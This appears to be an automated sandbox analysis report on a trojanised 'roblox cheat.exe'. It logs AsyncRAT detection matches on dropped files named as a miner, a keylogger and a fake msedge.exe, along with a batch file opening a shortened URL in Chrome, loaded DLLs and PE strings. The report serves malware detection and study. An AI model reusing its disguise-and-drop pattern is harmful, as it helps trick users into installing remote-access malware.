            Source: roblox cheat.exe, 00000000.00000002.1253258267.000000000139E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs roblox cheat.exe
            Source: roblox cheat.exe, 00000000.00000002.1255092707.00000000046E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exe Binary or memory string: OriginalFilenameRoblox.exeH vs roblox cheat.exe
            Source: roblox cheat.exe Binary or memory string: OriginalFilenamepayload.exe4 vs roblox cheat.exe
            Source: roblox cheat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: BitCoin_miner.exe.3.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, tMXwX3tWlMuOZgJ.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.3.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.3.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine Classification label: mal90.troj.spyw.evad.winEXE@26/17@22/12
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16BB6D8 GetLastError,FormatMessageW,LocalFree,3_2_00007FF6C16BB6D8
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16D8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00007FF6C16D8624
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe File created: C:\Program Files (x86)\Roblox
            Source: C:\Users\user\Desktop\roblox cheat.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\roblox cheat.exe.log
            Source: C:\Users\user\Desktop\roblox cheat.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
            Source: C:\Users\user\Desktop\roblox cheat.exe File created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "
            Source: roblox cheat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: roblox cheat.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
            Source: C:\Users\user\Desktop\roblox cheat.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\roblox cheat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: roblox cheat.exe ReversingLabs: Detection: 60%
            Source: roblox cheat.exe String found in binary or memory: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\Installer\Windows\include\Installer/Installer.h
            Source: roblox cheat.exe String found in binary or memory: Miscellaneous-Installation-of-desktop-items
            Source: roblox cheat.exe String found in binary or memory: Miscellaneous-Launching-programs-and-files-in-an-IFRAME
            Source: roblox cheat.exe String found in binary or memory: Miscellaneous-Launching-applications-and-unsafe-files
            Source: roblox cheat.exe String found in binary or memory: Miscellaneous-Allow-websites-to-open-windows-without-address-or-status-bars
            Source: roblox cheat.exe String found in binary or memory: ShowFlashMessage('Worst: ' + (end-start).toFixed(2) + 'ms ' + TimerInfo[Token].name, 100);
            Source: roblox cheat.exe String found in binary or memory: EnabledByDefaultEnabledSetByGroupPolicyDisabledSetByGroupPolicyEnabledSetByDefaultPolicyDisabledSetByDefaultPolicySOFTWARE\Policies\Microsoft\EdgeUpdateWebView2 Runtime Not InstalledInstallWebView2RuntimeTimeoutMsUpdate{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}Install{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}InstallDefault108.0.1462.37C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\WebView2Runtime.cppMicrosoftEdgeWebview2Setup.exe /silent /installFailed to create %sFailed to wait %sFailed to get exit processExitCode %s%s exited with failure processExitCode: %u/silent /installrunasFailed to admin execute %sFailed to admin wait %sFailed to admin get exit processExitCode %sSetDefaultDllDirectoriesC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\DLLHelpers.cppfailed to load message resource %uC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\LocalizedText.cppfailed to lock resource %ufailed to find message resource %ufailed to find RCDATA resource %ufailed to get size of resource %uNULL argumentC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\DirectXVersion.cppD3D11CreateDeviced3d11.dllFailed to load function D3D11CreateDeviceFailed to create directX device
            Source: roblox cheat.exe String found in binary or memory: iphlpapi.dllif_nametoindexws2_32FreeAddrInfoExWGetAddrInfoExCancelGetAddrInfoExWLoadLibraryExA\/AddDllDirectoryh1h2h3%10s %512s %u %10s %512s %u "%64[^"]" %u %urt%s %s%s%s %u %s %s%s%s %u "%d%02d%02d %02d:%02d:%02d" %u %d
            Source: roblox cheat.exe String found in binary or memory: set-addPolicy
            Source: roblox cheat.exe String found in binary or memory: id-cmc-addExtensions
            Source: unknown Process created: C:\Users\user\Desktop\roblox cheat.exe "C:\Users\user\Desktop\roblox cheat.exe"
            Source: C:\Users\user\Desktop\roblox cheat.exe Process created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe"
            Source: C:\Users\user\Desktop\roblox cheat.exe Process created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe"
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2184,i,14828535627695779647,3084874413555431357,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" Jump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2184,i,14828535627695779647,3084874413555431357,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: slc.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: dlnashext.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Section loaded: wpdshext.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: powrprof.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: umpdc.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: textshaping.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: d3d11.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: dxgi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: resourcepolicyclient.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: d3d10warp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: napinsp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: pnrpnsp.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: wshbth.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: nlaapi.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Section loaded: winrnr.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: dxgidebug.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: sfc_os.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: riched20.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: usp10.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: msls31.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: textshaping.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: pcacli.dll
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: ndfapi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wdi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: duser.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: atlthunk.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: textshaping.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: textinputframework.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: coreuicomponents.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: coremessaging.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: ndfapi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wdi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: ndfapi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wdi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: ieframe.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: netapi32.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: version.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: mlang.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wininet.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\roblox cheat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Automated click: OK
            Source: C:\Windows\System32\cmd.exe Automated click: OK
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\roblox cheat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: roblox cheat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: roblox cheat.exe Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: roblox cheat.exe Static file information: File size 6410752 > 1048576
            Source: roblox cheat.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x60fc00
            Source: roblox cheat.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: roblox cheat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: \rat\BitJoiner\payload\obj\Debug\payload.pdb source: roblox cheat.exe
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: roblox cheat.exe, cheatinstaler cheatinstalerF6R54T.exe.0.dr
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
